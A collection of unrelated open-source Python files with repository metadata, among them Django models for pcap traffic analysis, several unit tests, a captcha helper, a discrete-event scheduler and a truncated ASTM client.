packets = ListField(EmbeddedModelField('PacketDetails', null=True, blank=True))
def __unicode__(self):
return u'%s/%s' % (self.path, self.file_name)
def get_upload_path(self):
hash_dir = os.path.basename(self.path)
root = os.path.basename(os.path.dirname(self.path))
return os.path.join(root, hash_dir)
# there should also be a table of fields that keeps the traffic bytes related to the communication
class PacketDetails(models.Model):
#datetime.datetime.fromtimestamp(float("1286715787.71")).strftime('%Y-%m-%d %H:%M:%S')
ident = models.IntegerField()
flow_hash = models.CharField(max_length=50)
timestamp = models.DateTimeField()
length = models.IntegerField()
protocol = models.IntegerField()
src_ip = models.IPAddressField()
dst_ip = models.IPAddressField()
sport = models.IntegerField()
dport = models.IntegerField()
data = models.TextField(null=True, blank=True)
def __unicode__(self):
return u'(%s, %s, %s, %s, %s)' % (self.protocol, self.src_ip, self.sport, self.dst_ip, self.dport)
objects = MongoDBManager()
# save the ips at the applayerproto.log (http.log for ex)
class FlowDetails(models.Model):
parent_hash_value = models.CharField(max_length=50)
user_id = models.CharField(max_length=100)
src_ip = models.IPAddressField()
dst_ip = models.IPAddressField()
sport = models.IntegerField()
dport = models.IntegerField()
protocol = models.CharField(max_length=10)
timestamp = models.DateTimeField()
objects = MongoDBManager()
class HTTPDetails(models.Model):
# request or response
http_type = models.CharField(max_length=10)
# request fields
method = models.CharField(max_length=5, null=True, blank=True)
uri = models.URLField(null=True, blank=True)
headers = models.TextField(null=True, blank=True)
version = models.FloatField(null=True, blank=True)
# request part ends
# response fields
# header and version is here also
    reason = models.CharField(max_length=5, null=True, blank=True)
status = models.IntegerField(null=True, blank=True)
# i might need body
body = models.TextField(null=True, blank=True)
content_type = models.CharField(max_length=25, null=True, blank=True)
content_encoding = models.CharField(max_length=25, null=True, blank=True)
# response ends
# i might need files also
files = ListField(null=True, blank=True)
file_path = models.CharField(max_length=200, null=True, blank=True)
flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)
#for raw_qeuries, filtering according to flow_details will be possible
objects = MongoDBManager()
class DNSRequest(models.Model):
type = models.IntegerField()
human_readable_type = models.CharField(max_length=50)
value = models.CharField(max_length=50, null=True, blank=True)
flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)
objects = MongoDBManager()
class DNSResponse(models.Model):
type = models.IntegerField()
human_readable_type = models.CharField(max_length=50)
value = ListField(null=True, blank=True)
flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)
objects = MongoDBManager()
class SMTPDetails(models.Model):
login_data = ListField(null=True, blank=True)
msg_from = models.CharField(max_length=100, null=True, blank=True)
rcpt_to = models.CharField(max_length=100, null=True, blank=True)
raw = models.TextField(null=True, blank=True)
msgdata = models.TextField(null=True, blank=True)
attachment_path = ListField(null=True, blank=True)
flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)
objects = MongoDBManager()
def get_path_dict(self):
#/home/oguz/git/ovizart/ovizart/uploads/16-06-12/a6a6defb7253043a55281d01aa66538a/smtp-messages/1/part-001.ksh
result = []
for path in self.attachment_path:
tmp = dict()
r = path.split("uploads")
file_name = os.path.basename(r[1])
tmp['file_name'] = file_name
tmp['path'] = r[1]
result.append(tmp)
return result
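# --- Illustrative sketch (not part of the original module) ---
# get_path_dict() above splits each stored attachment path on the literal
# "uploads" segment and keeps the tail as a web-relative path:
#
#     path = "/home/oguz/git/ovizart/ovizart/uploads/16-06-12/a6a6defb7253043a55281d01aa66538a/smtp-messages/1/part-001.ksh"
#     tail = path.split("uploads")[1]      # "/16-06-12/.../part-001.ksh"
#     file_name = os.path.basename(tail)   # "part-001.ksh"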
|
oguzy/ovizart
|
ovizart/pcap/models.py
|
Python
|
gpl-3.0
| 5,743
| 0.003657
|
from django.urls import reverse
from oppia.test import OppiaTestCase
from reports.models import DashboardAccessLog
class ContextProcessorTest(OppiaTestCase):
fixtures = ['tests/test_user.json',
'tests/test_oppia.json',
'tests/test_quiz.json',
'tests/test_permissions.json',
'tests/test_course_permissions.json',
'tests/test_question_indices.json',
'tests/awards/award-course.json',
'tests/test_certificatetemplate.json']
# home page not logged in
def test_get_home_not_logged_in(self):
dal_start_count = DashboardAccessLog.objects.all().count()
self.client.get(reverse('oppia:index'))
dal_end_count = DashboardAccessLog.objects.all().count()
# shouldn't add a log for non logged in users
self.assertEqual(dal_start_count, dal_end_count)
# home page - all users - get
def test_get_home_logged_in(self):
for user in (self.admin_user,
self.normal_user,
self.teacher_user,
self.staff_user):
self.client.force_login(user=user)
dal_start_count = DashboardAccessLog.objects.all().count()
self.client.get(reverse('oppia:index'), follow=True)
dal_end_count = DashboardAccessLog.objects.all().count()
self.assertEqual(dal_start_count+1, dal_end_count)
# home page - all users - post
def test_post_home_logged_in(self):
for user in (self.admin_user,
self.normal_user,
self.teacher_user,
self.staff_user):
self.client.force_login(user=user)
dal_start_count = DashboardAccessLog.objects.all().count()
self.client.post(reverse('oppia:index'),
follow=True,
data={'test': 'mytest'})
dal_end_count = DashboardAccessLog.objects.all().count()
self.assertEqual(dal_start_count+1, dal_end_count)
# admin pages get
def test_get_admin(self):
dal_start_count = DashboardAccessLog.objects.all().count()
self.client.force_login(user=self.admin_user)
self.client.get(reverse('admin:oppia_course_changelist'))
dal_end_count = DashboardAccessLog.objects.all().count()
# shouldn't add a log for admin
self.assertEqual(dal_start_count, dal_end_count)
# admin pages post
# api pages
# sensitive info
|
DigitalCampus/django-oppia
|
tests/oppia/test_context_processors.py
|
Python
|
gpl-3.0
| 2,547
| 0
|
import os, requests, tempfile, time, webbrowser
import lacuna.bc
import lacuna.exceptions as err
### Dev notes:
### The tempfile containing the captcha image is not deleted until solveit()
### has been called.
###
### Allowing the tempfile to delete itself (delete=True during tempfile
### creation), or using the tempfile in conjunction with a 'with:' expression,
### have both been attempted.
###
### The problem is that, when using those auto-deletion methods, the tempfile
### is occasionally being removed from the system before the image viewer
### we're firing off actually gets a chance to read it. Everything is
### happening in the right order, it's just that the image viewer startup is
### too slow.
###
### Deleting the tempfile manually in solveit() works - don't decide to get
### clever and replace the unlink() in solveit() with some form of tempfile
### autodeletion without a lot of testing.
class Captcha(lacuna.bc.LacunaObject):
""" Fetches, displays, and solves graphical captchas.
General usage will be::
cap = my_client.get_captcha()
cap.showit() # display the captcha image
cap.prompt_user() # ask the user for a solution
cap.solveit() # check the user's solution
"""
path = 'captcha'
@lacuna.bc.LacunaObject.call_returning_meth
def fetch( self, **kwargs ):
""" Fetches a captcha for the user to solve from the server.
This mirrors the TLE API, but you generally don't need to call this.
Returns a :class:`lacuna.captcha.Puzzle` object.
"""
return Puzzle( self.client, kwargs['rslt'] )
def showit( self ):
""" Actually downloads the captcha image, and attempts to display it
to the user in one of several browsers.
If :meth:`fetch` is called first, :meth:`showit` uses that fetched data, but
this is not necessary. :meth:`showit` will call fetch for you.
Raises :class:`lacuna.exceptions.RequestError` if the image is not
fetchable (network error or the TLE servers have gone down).
Raises EnvironmentError if it cannot find an image viewer to use to
display the captcha image.
"""
if not hasattr(self,'url') or not hasattr(self,'guid'):
puzzle = self.fetch()
self.url = puzzle.url
self.guid = puzzle.guid
img_resp = requests.get( self.url )
if img_resp.status_code != 200:
raise err.RequestError("The captcha image URL is not responding.")
        f = tempfile.NamedTemporaryFile( suffix='.png', prefix='tle_captcha_', delete=False )
self.tempfile = f.name
f.write( img_resp.content )
if hasattr(img_resp, 'connection'):
img_resp.connection.close()
local_url = 'file://' + f.name
found_browser = False
for b in [ None, 'windows-default', 'macosx', 'safari', 'firefox',
'google-chrome', 'chrome', 'chromium-browser', 'chromium' ]:
try:
browser = webbrowser.get( b )
browser.open( local_url, 0, True )
found_browser = True
break
except webbrowser.Error as e:
pass
if not found_browser:
raise EnvironmentError("Unable to find a browser to show the captcha image. Captcha solution is required.")
def prompt_user(self):
""" Prompts the user to solve the displayed captcha.
        It's not illegal to call this without first calling :meth:`showit`,
but doing so makes no sense.
"""
self.resp = input("Enter the solution to the captcha here: ")
return self.resp
def solveit(self):
""" Sends the user's response to the server to check for accuracy.
Returns True if the user's response was correct. Raises
:class:`lacuna.exceptions.CaptchaResponseError` otherwise.
"""
if not hasattr(self,'resp'):
raise AttributeError("You must prompt the user for a response before calling solveit().")
try:
self.solve( self.guid, self.resp )
except err.ServerError as e:
raise err.CaptchaResponseError("Incorrect captcha response")
finally:
delattr( self, 'url' )
delattr( self, 'guid' )
delattr( self, 'resp' )
if os.path.isfile(self.tempfile):
os.unlink( self.tempfile )
return True
@lacuna.bc.LacunaObject.call_member_meth
def solve( self, guid:str, solution:str, **kwargs ):
""" Mirrors the TLE Captcha module's :meth:`solve` method, but unless you
really need this and you really know why, use :meth:`solveit` instead.
"""
pass
class Puzzle(lacuna.bc.SubClass):
"""
Object Attributes::
url FQ URL to the puzzle image
guid uuid attached to the puzzle; must be passed back along with
the solution.
"""
|
tmtowtdi/MontyLacuna
|
lib/lacuna/captcha.py
|
Python
|
mit
| 5,055
| 0.017013
|
from __future__ import unicode_literals
import os.path
from pre_commit.commands.clean import clean
from pre_commit.util import rmtree
def test_clean(runner_with_mocked_store):
assert os.path.exists(runner_with_mocked_store.store.directory)
clean(runner_with_mocked_store)
assert not os.path.exists(runner_with_mocked_store.store.directory)
def test_clean_empty(runner_with_mocked_store):
"""Make sure clean succeeds when we the directory doesn't exist."""
rmtree(runner_with_mocked_store.store.directory)
assert not os.path.exists(runner_with_mocked_store.store.directory)
clean(runner_with_mocked_store)
assert not os.path.exists(runner_with_mocked_store.store.directory)
|
Teino1978-Corp/pre-commit
|
tests/commands/clean_test.py
|
Python
|
mit
| 711
| 0
|
class Controller(object):
def __init__(self, model):
self._model = model
self._view = None
def register_view(self, view):
self._view = view
def on_quit(self, *args):
raise NotImplementedError
def on_keybinding_activated(self, core, time):
raise NotImplementedError
def on_show_about(self, sender):
raise NotImplementedError
def on_toggle_history(self, sender):
raise NotImplementedError
def on_show_preferences(self, sender):
raise NotImplementedError
def on_query_entry_changed(self, entry):
raise NotImplementedError
def on_query_entry_key_press_event(self, entry, event):
raise NotImplementedError
def on_query_entry_activate(self, entry):
raise NotImplementedError
def on_treeview_cursor_changed(self, treeview):
raise NotImplementedError
def on_match_selected(self, treeview, text, match_obj, event):
raise NotImplementedError
def on_do_default_action(self, treeview, text, match_obj, event):
raise NotImplementedError
def on_action_selected(self, treeview, text, action, event):
raise NotImplementedError
def on_clear_history(self, sender):
raise NotImplementedError
def on_history_match_selected(self, history, text, match):
raise NotImplementedError
|
benpicco/mate-deskbar-applet
|
deskbar/interfaces/Controller.py
|
Python
|
gpl-2.0
| 1,455
| 0.010309
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
from ggrc.converters import errors
from integration.ggrc import converters
class TestBasicCsvImport(converters.TestCase):
def setUp(self):
converters.TestCase.setUp(self)
self.client.get("/login")
def test_policy_basic_import(self):
filename = "ca_setup_for_deletion.csv"
self.import_file(filename)
filename = "ca_deletion.csv"
response_data_dry = self.import_file(filename, dry_run=True)
response_data = self.import_file(filename)
self.assertEqual(response_data_dry, response_data)
self.assertEqual(response_data[0]["deleted"], 2)
self.assertEqual(response_data[0]["ignored"], 0)
|
NejcZupec/ggrc-core
|
test/integration/ggrc/converters/test_import_delete.py
|
Python
|
apache-2.0
| 744
| 0.002688
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
with open('requirements.txt') as f:
requirements = f.read().splitlines()
with open('cli-requirements.txt') as f:
cli_requirements = f.read().splitlines()
setuptools.setup(
name="uwg",
use_scm_version=True,
setup_requires=['setuptools_scm'],
author="Ladybug Tools",
author_email="info@ladybug.tools",
description="Python application for modeling the urban heat island effect.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ladybug-tools/uwg",
packages=setuptools.find_packages(exclude=["tests*", "resources*"]),
include_package_data=True,
install_requires=requirements,
extras_require={
'cli': cli_requirements
},
entry_points={
"console_scripts": ["uwg = uwg.cli:main"]
},
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: Implementation :: CPython",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Operating System :: OS Independent"
],
)
|
chriswmackey/UWG_Python
|
setup.py
|
Python
|
gpl-3.0
| 1,278
| 0.000782
|
from collections import UserList
from gear import ffxiv, xivdb
from gear import power as p
"""Class representing a simple gear element.
"""
class Gear(object):
"""Gear(slot, item_id, **attributes)
slot : in which slot of the gearset is this precise gear, as defined
in ffxiv.slots.
item_id : identifier from xivdb.com. Will load the gear
from there if provided
attributes : the attributes of the gear as defined in ffxiv.attributes.
"""
def __init__(self, slot, item_id = None, **attributes):
if item_id is not None :
attributes = xivdb.getId(item_id)
        assert(slot is None or slot in ffxiv.slots)
self.slot = slot
# We filter out what is not a legitimate FFXIV attribute
self.attributes = dict(filter(
lambda a:a[0] in ffxiv.attributes,
attributes.items()))
# We put the rest in self.misc
self.misc = dict(filter(
lambda a:a[0] not in ffxiv.attributes,
attributes.items()))
"""Class representing a complete gear set.
Can be called by specifying the Lodestone ID for
the character or by specifying the gear
for each gear slot, as defined in ffxiv.slots.
"""
class GearSet(Gear):
"""GearSet(character_id, **gears)
character_id : provide to load gearset from Lodestone.
gears : pairs slot=Gear
"""
def __init__(self,
character_id=None,
**gears
):
self.gears = {}
# If we do not fetch the gearset from Lodestone
if character_id is None:
for s in ffxiv.slots:
g = gears.get(s)
assert(g is None or g.slot == s)
                self.gears[s] = g
else:
pass #TODO add fetching gearset from Lodestone
# A GearSet is treated as a Gear, so we update the attributes
attributes = { k : sum(
[g.attributes.get(k,0)
for g in self.gears.values() if g is not None
], start=0)
for k in ffxiv.attributes}
        super().__init__(None, **attributes)
"""List of GearSets to compare.
"""
class GearSetList(UserList):
"""GearSetList(data)
data : an iterable of gearsets
"""
def __init__(self, data=[]):
super().__init__(data)
"""maxPower(job,consraintList)
Returns the best gearset for job given a list of constraints.
"""
def maxPower(self,job, constraintList=None):
pass
"""Function to calculate the power of a gear for job.
"""
def power(gear, job):
return sum([int(gear.attributes.get(k,0))*v
for k,v in ffxiv.weights[job].items()])
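# --- Illustrative sketch (not part of the original module) ---
# power() is a plain dot product between a gear's attributes and the per-job
# weight table. With hypothetical weights {'crit': 2, 'det': 1} and gear
# attributes {'crit': 100, 'det': 50}, the score is 2*100 + 1*50 = 250.
#
#     g = Gear('weapon', crit=100, det=50)   # assumes 'weapon' in ffxiv.slots
#     power(g, 'BLM')                        # assumes 'BLM' in ffxiv.weights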
|
Rosslaew/OptiGear
|
gear/gear.py
|
Python
|
mit
| 2,681
| 0.012309
|
import sys
sys.path.insert(1, "../../../")
import h2o
def binop_plus(ip,port):
# Connect to h2o
h2o.init(ip,port)
iris = h2o.import_frame(path=h2o.locate("smalldata/iris/iris_wheader_65_rows.csv"))
rows, cols = iris.dim()
iris.show()
###################################################################
    # LHS: scalar, RHS: H2OFrame
res = 2 + iris
res_rows, res_cols = res.dim()
assert res_rows == rows and res_cols == cols, "dimension mismatch"
for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]):
assert abs(x - y) < 1e-1, "expected same values"
    # LHS: scalar, RHS: scalar
res = 2 + iris[0]
res2 = 1.1 + res[21,:]
assert abs(res2 - 8.2) < 1e-1, "expected same values"
###################################################################
    # LHS: scalar, RHS: H2OFrame
res = 1.2 + iris[2]
res2 = res[21,:] + iris
res2.show()
    # LHS: scalar, RHS: H2OVec
res = 1.2 + iris[2]
res2 = res[21,:] + iris[1]
res2.show()
    # LHS: scalar, RHS: scalar
res = 1.1 + iris[2]
res2 = res[21,:] + res[10,:]
assert abs(res2 - 5.2) < 1e-1, "expected same values"
    # LHS: scalar, RHS: scalar
res = 2 + iris[0]
res2 = res[21,:] + 3
assert abs(res2 - 10.1) < 1e-1, "expected same values"
###################################################################
# LHS: H2OVec, RHS: H2OFrame
#try:
# res = iris[2] + iris
# res.show()
# assert False, "expected error. objects with different dimensions not supported."
#except EnvironmentError:
# pass
    # LHS: H2OVec, RHS: scalar
res = 1.2 + iris[2]
res2 = iris[1] + res[21,:]
res2.show()
###################################################################
# LHS: H2OFrame, RHS: H2OFrame
res = iris + iris
res_rows, res_cols = res.dim()
assert res_rows == rows and res_cols == cols, "dimension mismatch"
res = iris[0:2] + iris[1:3]
res_rows, res_cols = res.dim()
assert res_rows == rows and res_cols == 2, "dimension mismatch"
#try:
# res = iris + iris[0:3]
# res.show()
# assert False, "expected error. frames are different dimensions."
#except EnvironmentError:
# pass
# LHS: H2OFrame, RHS: H2OVec
#try:
# res = iris + iris[0]
# res.show()
# assert False, "expected error. objects of different dimensions not supported."
#except EnvironmentError:
# pass
    # LHS: H2OFrame, RHS: scalar
res = 1.2 + iris[2]
res2 = iris + res[21,:]
res2.show()
    # LHS: H2OFrame, RHS: scalar
res = iris + 2
res_rows, res_cols = res.dim()
assert res_rows == rows and res_cols == cols, "dimension mismatch"
for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]):
assert abs(x - y) < 1e-1, "expected same values"
###################################################################
if __name__ == "__main__":
h2o.run_test(sys.argv, binop_plus)
|
ChristosChristofidis/h2o-3
|
h2o-py/tests/testdir_munging/binop/pyunit_binop2_plus.py
|
Python
|
apache-2.0
| 3,072
| 0.008138
|
"""
https://codility.com/programmers/task/equi_leader/
"""
from collections import Counter, defaultdict
def solution(A):
def _is_equi_leader(i):
prefix_count_top = running_counts[top]
suffix_count_top = total_counts[top] - prefix_count_top
return (prefix_count_top * 2 > i + 1) and (suffix_count_top * 2 > len(A) - i - 1)
total_counts = Counter(A)
running_counts = defaultdict(int)
top = A[0]
result = 0
for i in xrange(len(A) - 1):
n = A[i]
running_counts[n] += 1
top = top if running_counts[top] >= running_counts[n] else n
if _is_equi_leader(i):
result += 1
return result
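# --- Worked example (not part of the original solution) ---
# For A = [4, 3, 4, 4, 4, 2] the leader is 4. Splitting after index 0 gives
# [4] / [3, 4, 4, 4, 2] and splitting after index 2 gives [4, 3, 4] / [4, 4, 2];
# in both cases 4 leads both halves, so the answer is 2.
if __name__ == '__main__':
    assert solution([4, 3, 4, 4, 4, 2]) == 2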
|
py-in-the-sky/challenges
|
codility/equi_leader.py
|
Python
|
mit
| 707
| 0.007072
|
# Copyright 2014 Modelling, Simulation and Design Lab (MSDL) at
# McGill University and the University of Antwerp (http://msdl.cs.mcgill.ca/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The No Age scheduler is based on the Heapset scheduler, though it does not take age into account.
.. warning:: This scheduler does not take the age into account, making it **unusable** in simulations where the *timeAdvance* function can return (exactly) 0. If unsure, do **not** use this scheduler, but the more general Heapset scheduler.
The heap will contain only the timestamps of events that should happen. One of the dictionaries will contain the actual models that transition at the specified time. The second dictionary then contains a reverse relation: it maps the models to their time_next. This reverse relation is necessary to know the *old* time_next value of the model, because as soon as the model's time_next changes, its previously scheduled time would otherwise be unknown. This 'previous time' is **not** equal to the *timeLast*, as it is possible that the model's wait time was interrupted.
For a schedule, the model is added to the dictionary at the specified time_next. In case it is the first element at this location in the dictionary, we also add the timestamp to the heap. This way, the heap only contains *unique* timestamps and thus the actual complexity is reduced to the number of *different* timestamps. Furthermore, the reverse relation is also updated.
Unscheduling is done similarly by simply removing the element from the dictionary.
Rescheduling is a slight optimisation of unscheduling, followed by scheduling.
This scheduler does still schedule models that are inactive (their time_next is infinity), though this does not influence the complexity. The complexity is not affected due to infinity being a single element in the heap that is always present. Since a heap has O(log(n)) complexity, this one additional element does not have a serious impact.
The main advantage over the Activity Heap is that it never gets dirty and thus doesn't require periodical cleanup. The only part that gets dirty is the actual heap, which only contains small tuples. Duplicates of these will also be reduced to a single element, thus memory consumption should not be a problem in most cases.
This scheduler is ideal in situations where most transitions happen at exactly the same time, as we can then profit from the internal structure and simply return the mapped elements. It results in sufficient efficiency in most other cases, mainly due to the code base being a lot smaller than the Activity Heap's.
"""
from heapq import heappush, heappop
from pypdevs.logger import *
class SchedulerNA(object):
"""
Scheduler class itself
"""
def __init__(self, models, epsilon, total_models):
"""
Constructor
:param models: all models in the simulation
"""
self.heap = []
self.reverse = [None] * total_models
self.mapped = {}
self.infinite = float('inf')
# Init the basic 'inactive' entry here, to prevent scheduling in the heap itself
self.mapped[self.infinite] = set()
self.epsilon = epsilon
for m in models:
self.schedule(m)
def schedule(self, model):
"""
Schedule a model
:param model: the model to schedule
"""
try:
self.mapped[model.time_next[0]].add(model)
except KeyError:
self.mapped[model.time_next[0]] = set([model])
heappush(self.heap, model.time_next[0])
try:
self.reverse[model.model_id] = model.time_next[0]
except IndexError:
self.reverse.append(model.time_next[0])
def unschedule(self, model):
"""
Unschedule a model
:param model: model to unschedule
"""
try:
self.mapped[self.reverse[model.model_id]].remove(model)
except KeyError:
pass
self.reverse[model.model_id] = None
def massReschedule(self, reschedule_set):
"""
Reschedule all models provided.
Equivalent to calling unschedule(model); schedule(model) on every element in the iterable.
:param reschedule_set: iterable containing all models to reschedule
"""
        #NOTE the usage of exceptions is a lot better for the PyPy JIT and nets a noticeable speedup,
        #  as the JIT generates guard statements for an 'if'
for model in reschedule_set:
model_id = model.model_id
try:
self.mapped[self.reverse[model_id]].remove(model)
except KeyError:
# Element simply not present, so don't need to unschedule it
pass
self.reverse[model_id] = tn = model.time_next[0]
try:
self.mapped[tn].add(model)
except KeyError:
# Create a tuple with a single entry and use it to initialize the mapped entry
self.mapped[tn] = set((model, ))
heappush(self.heap, tn)
def readFirst(self):
"""
Returns the time of the first model that has to transition
:returns: timestamp of the first model
"""
first = self.heap[0]
while len(self.mapped[first]) == 0:
del self.mapped[first]
heappop(self.heap)
first = self.heap[0]
        # The age was stripped off, so re-attach a default age
return (first, 1)
def getImminent(self, time):
"""
Returns a list of all models that transition at the provided time, with the specified epsilon deviation allowed.
:param time: timestamp to check for models
.. warning:: For efficiency, this method only checks the **first** elements, so trying to invoke this function with a timestamp higher than the value provided with the *readFirst* method, will **always** return an empty set.
"""
t, age = time
imm_children = set()
try:
first = self.heap[0]
if (abs(first - t) < self.epsilon):
#NOTE this would change the original set, though this doesn't matter as it is no longer used
imm_children = self.mapped.pop(first)
heappop(self.heap)
first = self.heap[0]
while (abs(first - t) < self.epsilon):
imm_children |= self.mapped.pop(first)
heappop(self.heap)
first = self.heap[0]
except IndexError:
pass
return imm_children
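# Minimal usage sketch (illustrative, not part of PyPDEVS): a stub model
# exposing the two attributes the scheduler relies on, `time_next` (a
# (time, age) tuple) and `model_id`.
if __name__ == "__main__":
    class _StubModel(object):
        def __init__(self, model_id, time):
            self.model_id = model_id
            self.time_next = (time, 1)

    stubs = [_StubModel(i, t) for i, t in enumerate([5.0, 1.0, 1.0])]
    scheduler = SchedulerNA(stubs, 1e-6, len(stubs))
    first = scheduler.readFirst()
    print(first)                              # (1.0, 1)
    print(len(scheduler.getImminent(first)))  # 2 models fire at t=1.0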
|
kdheepak89/pypdevs
|
pypdevs/schedulers/schedulerNA.py
|
Python
|
apache-2.0
| 7,125
| 0.002947
|
# Grid Search for Algorithm Tuning
import numpy as np
import pandas as pd
from sklearn import datasets
from sklearn.linear_model import Ridge
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import mean_squared_error
from math import sqrt
### Plotting function ###
from matplotlib import pyplot as plt
from sklearn.metrics import r2_score
def plot_r2(y, y_pred, title):
plt.figure(figsize=(10, 6))
plt.grid()
plt.scatter(y, y_pred, marker='.')
plt.xlabel("Actual Target"); plt.ylabel("Predicted Target")
plt.title(title)
xmn, xmx = plt.xlim()
ymn, ymx = plt.ylim()
mx = max(xmx, ymx)
buff = mx * .1
plt.text(xmn + buff, mx - buff, "R2 Score: %f" % (r2_score(y, y_pred), ), size=15)
plt.plot([0., mx], [0., mx])
plt.xlim(xmn, mx)
plt.ylim(ymn, mx)
### Preprocessing ###
dataset = pd.read_csv("train.csv")
dataset.head()
feats = dataset.drop("revenue", axis=1)
X = feats.values #features
y = dataset["revenue"].values #target
# prepare a range of alpha values to test
alphas = np.array([1,0.1,0.01,0.001,0.0001,0])
# NOTE: an alpha around 100000 worked best in earlier runs, but it is not in the grid above.
# create and fit a ridge regression model, testing each alpha
model = Ridge()
grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas))
grid.fit(X, y)
y_pred = grid.predict(X)
print r2_score(y, y_pred)
rmse = sqrt(mean_squared_error(y, y_pred))
print rmse
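# Visual sanity check (illustrative): reuse the plot_r2 helper defined above
# to compare predicted and actual revenue for the fitted model.
plot_r2(y, y_pred, "Ridge regression, best alpha via grid search")
plt.show()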
|
WesleyyC/Restaurant-Revenue-Prediction
|
Ari/needs_work/GridSearch.py
|
Python
|
mit
| 1,295
| 0.018533
|
from .site import Site
|
msosvi/flask-pyco
|
flask_pyco/__init__.py
|
Python
|
bsd-3-clause
| 23
| 0
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Alexander Shorin
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
import logging
import socket
from .asynclib import loop
from .codec import encode
from .constants import ENQ, EOT
from .exceptions import NotAccepted
from .mapping import Record
from .protocol import ASTMProtocol
log = logging.getLogger(__name__)
__all__ = ['Client', 'Emitter']
class RecordsStateMachine(object):
"""Simple state machine to track emitting ASTM records in right order.
:param mapping: Mapping of the ASTM records flow order.
Keys should be string and defines record type, while values
expected as sequence of other record types that may be used
after current one.
For example: ``{"H": ["P", "C", "L"]}`` mapping defines that
if previous record had ``"H"`` type, then the next one
should have ``"P"``, ``"C"`` or ``"L"`` type or
:exc:`AssertionError` will be raised. The default mapping
reflects common ASTM records flow rules. If this argument
specified as :const:`None` no rules will be applied.
:type: dict
"""
def __init__(self, mapping):
self.mapping = mapping
self.state = None
def __call__(self, state):
if state is not None:
assert self.is_acceptable(state),\
'invalid state %r, expected one of: %r' \
% (state, self.mapping[self.state])
self.state = state
def is_acceptable(self, state):
if self.mapping is None:
return True
if state not in self.mapping:
return False
next_types = self.mapping[self.state]
return '*' in next_types or state in next_types
DEFAULT_RECORDS_FLOW_MAP = {
None: ['H'],
'H': ['C', 'M', 'P', 'Q', 'L'],
'P': ['C', 'M', 'O', 'L'],
'Q': ['C', 'M', 'O', 'L'],
'O': ['C', 'M', 'P', 'O', 'R', 'L'],
'R': ['C', 'M', 'P', 'O', 'R', 'S', 'L'],
'S': ['C', 'M', 'P', 'O', 'R', 'S', 'L'],
'C': ['*'],
'M': ['*'],
'L': ['H']
}
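# Example reading of the map above: H -> P -> O -> R -> L is a valid record
# sequence, and a Terminator ('L') may only be followed by a new Header ('H').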
class Emitter(object):
"""ASTM records emitter for :class:`Client`.
    Used as a wrapper around the user-provided one to supply the proper
    routines for sending Header and Terminator records.
:param emitter: Generator/coroutine.
:param encoding: Data encoding.
:type encoding: str
:param flow_map: Records flow map. Used by :class:`RecordsStateMachine`.
:type: dict
    :param chunk_size: Chunk size in bytes. If :const:`None`, emitter records
                       won't be split into chunks.
:type chunk_size: int
:param bulk_mode: Sends all records for single session (starts from Header
and ends with Terminator records) via single message
instead of sending each record separately. If result
message is too long, it may be split by chunks if
`chunk_size` is not :const:`None`. Keep in mind, that
collecting all records for single session may take some
time and server may reject data by timeout reason.
:type bulk_mode: bool
"""
    #: Records state machine controls emitting records in the right order. It
    #: receives `records_flow_map` as the only argument on Emitter initialization.
state_machine = RecordsStateMachine
def __init__(self, emitter, flow_map, encoding,
chunk_size=None, bulk_mode=False):
self._emitter = emitter()
self._is_active = False
self.encoding = encoding
self.records_sm = self.state_machine(flow_map)
# flag to signal that user's emitter produces no records
self.empty = False
# last sent sequence number
self.last_seq = 0
self.buffer = []
self.chunk_size = chunk_size
self.bulk_mode = bulk_mode
def _get_record(self, value=None):
record = self._emitter.send(value if self._is_active else None)
if not self._is_active:
self._is_active = True
if isinstance(record, Record):
record = record.to_astm()
try:
self.records_sm(record[0])
except Exception as err:
self.throw(type(err), err.args)
return record
def _send_record(self, record):
if self.bulk_mode:
records = [record]
while True:
record = self._get_record(True)
records.append(record)
if record[0] == 'L':
break
chunks = encode(records, self.encoding, self.chunk_size)
else:
self.last_seq += 1
chunks = encode([record], self.encoding,
self.chunk_size, self.last_seq)
self.buffer.extend(chunks)
data = self.buffer.pop(0)
self.last_seq += len(self.buffer)
if record[0] == 'L':
self.last_seq = 0
self.buffer.append(EOT)
return data
def send(self, value=None):
"""Passes `value` to the emitter. Semantically acts in same way as
:meth:`send` for generators.
If the emitter has any value within local `buffer` the returned value
will be extracted from it unless `value` is :const:`False`.
:param value: Callback value. :const:`True` indicates that previous
record was successfully received and accepted by server,
                      :const:`False` signals its rejection.
:type value: bool
:return: Next record data to send to server.
:rtype: bytes
"""
if self.buffer and value:
return self.buffer.pop(0)
record = self._get_record(value)
return self._send_record(record)
def throw(self, exc_type, exc_val=None, exc_tb=None):
"""Raises exception inside the emitter. Acts in same way as
:meth:`throw` for generators.
        If the emitter catches the exception and returns a record value, it
        will be processed in the common way.
"""
record = self._emitter.throw(exc_type, exc_val, exc_tb)
if record is not None:
return self._send_record(record)
def close(self):
"""Closes the emitter. Acts in same way as :meth:`close` for generators.
"""
self._emitter.close()
class Client(ASTMProtocol):
"""Common ASTM client implementation.
:param emitter: Generator function that will produce ASTM records.
:type emitter: function
:param host: Server IP address or hostname.
:type host: str
:param port: Server port number.
:type port: int
:param timeout: Time to wait for response from server. If response wasn't
received, the :meth:`on_timeout` will be called.
